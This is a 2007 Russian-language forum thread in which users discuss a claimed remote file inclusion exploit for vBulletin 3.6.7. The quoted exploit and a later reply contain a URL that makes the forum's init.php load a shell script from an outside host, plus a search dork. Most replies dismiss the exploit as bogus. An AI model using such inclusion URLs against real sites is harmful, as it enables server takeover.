Уязвимость в 3.6.7

07-11-2007, 08:48 PM

Здравствуйте....
найдена уязвимость в версии форума 3.6.7

Вот есть уязвимость vBulletin 3.6.7 PL1 Remote File Inclusion

Quote:

#Exploit
r@r3d-crew.com
Code in: global.php
#Vul code:Vul code:require_once(CWD . '/includes/init.php');
-----------------------------------------------------------------------------
#Exploit
#http://www.name.com/forum/includes/i...om/sshell.txt?
--------------------------------------------------------------------------
#dork: vBulletin 3.6.7 PL1
----------------------------------------------------------------------------
#Team-Hackers-al3akrab

Скажите в каких случаях она работает и как пофиксить?

07-11-2007, 08:59 PM

Работает когда в php злоумышленником добавлено system($_GET['cwd']);

п.с. используйте нули левых команд, да

07-11-2007, 09:15 PM

Quote:

Originally Posted by zCarot

w

m

07-11-2007, 11:12 PM

Quote:

Originally Posted by VipeR

m

VipeR, будь внимательнее
http://www.name.com/forum/includes/init.php?cwd=http://r3d-crew.com/sshell.txt?

07-11-2007, 11:20 PM

лол

UPD
#здец номер три

07-11-2007, 11:42 PM

шлак ))))

07-12-2007, 01:38 AM

Quote:

Originally Posted by zCarot

VipeR, будь внимательнее
http://www.name.com/forum/includes/init.php?cwd=http://r3d-crew.com/sshell.txt?

Окей, недоглядел =/

07-12-2007, 03:41 AM

Вот вам супер-пупер защита для всех версий булки. Я над ней долго работал.

Code:

unset($_GET['c']);
unset($_GET['cmd']);

Ах да, скачайте и допишите в конец последний апдейт. Хакеры все таки умнеют, и "опасные коды" палятся все тяжелее и тяжелее... но мы над этим работаем.

Code:

unset($_GET['cwd']);

07-12-2007, 05:27 AM

Уязвимость в форумном движке есть только одна - АДМИНИСТРАТОР. а точнее его кривые руки и не правельный моск.

07-12-2007, 07:00 AM

На моем форум при таком запросе выводит:

Quote:

VB_AREA or THIS_SCRIPT must be defined to continue

Ничего страшного нету?
Нул от vbsupport.ru